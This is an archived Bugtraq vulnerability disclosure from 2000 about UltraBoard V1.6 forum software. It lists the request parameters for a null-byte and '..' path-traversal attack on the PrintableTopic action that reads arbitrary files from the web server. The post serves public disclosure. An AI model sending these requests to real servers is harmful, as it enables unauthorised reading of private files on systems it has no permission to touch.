[14767] in bugtraq
Fun with UltraBoard V1.6X
daemon@ATHENA.MIT.EDU (rudi carell)
Wed May 3 17:59:56 2000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-Id: <20000503091316.99073.qmail@hotmail.com>
Date: Wed, 3 May 2000 02:13:16 PDT
Reply-To: rudi carell <rudicarell@HOTMAIL.COM>
From: rudi carell <rudicarell@HOTMAIL.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
hola friends,
found some interesting things in the "old" UltraBoard-Forum scripts
(UltraBoard V 1.6)
class:Input Validation Error
remote:Yes
vulnerable:UltraBoard V1.*
vendor: www.ultrascripts.com || www.ub2k.com
Description:
By using the good old NullByte(\000) its possible to open "any" file on the
webserver(with its permissions) running the "UltraBoard" forum-software.
cgi-script:
UltraBoard.pl || UltraBoard.cgi
Variables:
Action=PrintableTopic
Post=[path_including_".."_to_any_file][***NULLBYTE***]
Board=[valid_board]
Idle=10
Sort=0
Order=Descend
Page=0
Session=
hmm ... EOF
nizedays,
rudic
rudicarell@hotmail.com
<dream>"getrootallthetime"</dream>
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
